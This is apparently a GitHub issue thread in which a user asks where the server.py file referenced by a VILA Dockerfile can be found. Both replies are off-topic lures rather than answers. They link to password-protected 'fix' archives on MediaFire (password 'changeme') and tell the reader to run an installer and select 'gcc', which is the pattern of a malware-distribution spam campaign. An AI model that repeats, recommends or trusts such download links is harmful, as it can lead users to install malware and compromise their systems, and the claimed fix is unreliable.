### ISSUE TITLE
Where is the server.py script?

### ISSUE THREAD

**Issue by zixinglin07** [NVlabs/VILA#131]
Hi, I am looking to run the VILA API on the server by building the docker image. However, in the file one of the lines says 

`COPY server.py server.py`

But there is no server.py in the VILA directory. Where can I find it?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
